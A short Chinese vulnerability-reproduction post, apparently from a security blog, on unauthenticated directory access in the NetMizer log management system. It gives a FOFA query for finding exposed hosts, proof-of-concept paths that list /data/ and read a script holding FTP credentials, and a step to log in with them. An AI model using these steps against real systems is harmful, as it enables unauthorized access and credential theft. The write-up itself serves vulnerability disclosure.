NetMizer 日志管理未授权访问+FTP登录

漏洞描述

北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。
NetMizer 日志管理未授权访问+FTP登录_第1张图片

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:title=“NetMizer 日志管理系统”

漏洞复现

1.利用如下POC访问

http://{{Hostname}}/data/
NetMizer 日志管理未授权访问+FTP登录_第2张图片
2、ftp路径及账号信息
http://{ip}:{port}/data/bin/ftp_sqlouttofile.sh
NetMizer 日志管理未授权访问+FTP登录_第3张图片
3、用获取到的ftp账号登录
NetMizer 日志管理未授权访问+FTP登录_第4张图片

修复方案

你可能感兴趣的:(漏洞复现,漏洞复现,网络安全,web安全)